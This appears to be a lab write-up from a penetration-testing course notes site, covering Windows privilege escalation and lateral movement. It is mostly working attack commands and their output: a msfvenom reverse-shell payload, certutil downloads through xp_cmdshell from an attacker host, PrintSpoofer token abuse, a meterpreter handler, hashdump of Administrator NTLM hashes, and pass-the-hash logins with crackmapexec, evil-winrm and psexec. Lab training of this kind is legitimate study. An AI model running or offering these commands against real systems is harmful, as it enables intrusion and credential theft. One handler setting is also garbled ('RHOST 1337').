Privilege Escalation

Once we run whoami /priv we get privilege information:

Privilege Name                Description                               State      

============================= ========================================= ========   

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   

SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    

SeImpersonatePrivilege        Impersonate a client after authentication Enabled    

SeCreateGlobalPrivilege       Create global objects                     Enabled    

SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

We can see that we have SeImpersonatePrivilege which can be abused by printSpoofer. I downloaded the .exe file and uploaded it to the linux attack box:

scp PrintSpoofer32.exe  [email protected]:/home/htb-student/Desktop/ad

And then on the attack box I created a shell using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=1337 -f exe > fshell.exe

I experimented with multiple payloads and windows/x64/meterpreter/reverse_tcp seems the only one that gives me a shell with full privileges.

Now we need to upload both files into the SQL01 machine from the mssqlclient.py:

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/PrintSpoofer32.exe c:\users\Public\printSpoofer.exe"

xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240:8000/fshell.exe  c:\users\Public\fshell.exe"

Before we run the ultimate command we need to setup a meterpreter session:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.7.240
set RHOST 1337
run

Now run the ultimate command:

xp_cmdshell c:\users\Public\printSpoofer.exe -c "c:\users\Public\fshell.exe"

Once we get a shell, we can type hashdump to get the hash for Administrator.

C:\Windows\system32>exit
exit
(Meterpreter 1)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070:::

Lets try using the hash to access MS01 (172.16.7.50).

First we use crackmapexec to see if this hash can be used:

crackmapexec winrm 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing LDAP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
WINRM       172.16.7.50     5985   NONE             [*] None (name:172.16.7.50) (domain:None)
WINRM       172.16.7.50     5985   NONE             [*] http://172.16.7.50:5985/wsman
WINRM       172.16.7.50     5985   NONE             [+] None\Administrator:bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!)

And it says (Pwn3d!)

First Approach

So lets try winrm to authenticate:

evil-winrm -i 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
ms01\administrator

Second Approach

Using meterpreter psexec exploit. We have the hash from before 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99

We find the exploit in msfconsole:

search psexec

Matching Modules
================

   #   Name                                         Disclosure Date  Rank       Check  Description
   -   ----                                         ---------------  ----       -----  -----------
   0   auxiliary/scanner/smb/impacket/dcomexec      2018-03-19       normal     No     DCOM Exec
   1   exploit/windows/smb/ms17_010_psexec          2017-03-14       normal     Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2   auxiliary/admin/smb/ms17_010_command         2017-03-14       normal     No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3   auxiliary/scanner/smb/psexec_loggedin_users                   normal     No     Microsoft Windows Authenticated Logged In Users Enumeration
   4   exploit/windows/smb/psexec                   1999-01-01       manual     No     Microsoft Windows Authenticated User Code Execution
   5   auxiliary/admin/smb/psexec_ntdsgrab                           normal     No     PsExec NTDS.dit And SYSTEM Hive Download Utility
   6   exploit/windows/local/current_user_psexec    1999-01-01       excellent  No     PsExec via Current User Token
   7   encoder/x86/service                                           manual     No     Register Service
   8   auxiliary/scanner/smb/impacket/wmiexec       2018-03-19       normal     No     WMI Exec
   9   exploit/windows/smb/webexec                  2018-10-24       manual     No     WebExec Authenticated User Code Execution
   10  exploit/windows/local/wmi                    1999-01-01       excellent  No     Windows Management Instrumentation (WMI) Remote Command Execution// Some code

We have to set a few things:

SMBUser => Administrator
SMBPass => 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99
RHOST => 172.16.7.50
LHOST => 172.16.7.240
LPORT => 6767
run

This makes it simpler instead of running scripts from host to host.

Third Approach

Instead of using meterpreter shell I used psexec directly to get a shell:

psexec.py -hashes 00000000000000000000000000000000:bdaffbfe64f1fc646a3353be1c2c3c99 [email protected]

PreviousCredentials obtained NextLateral Movement

Last updated 1 year ago

Was this helpful?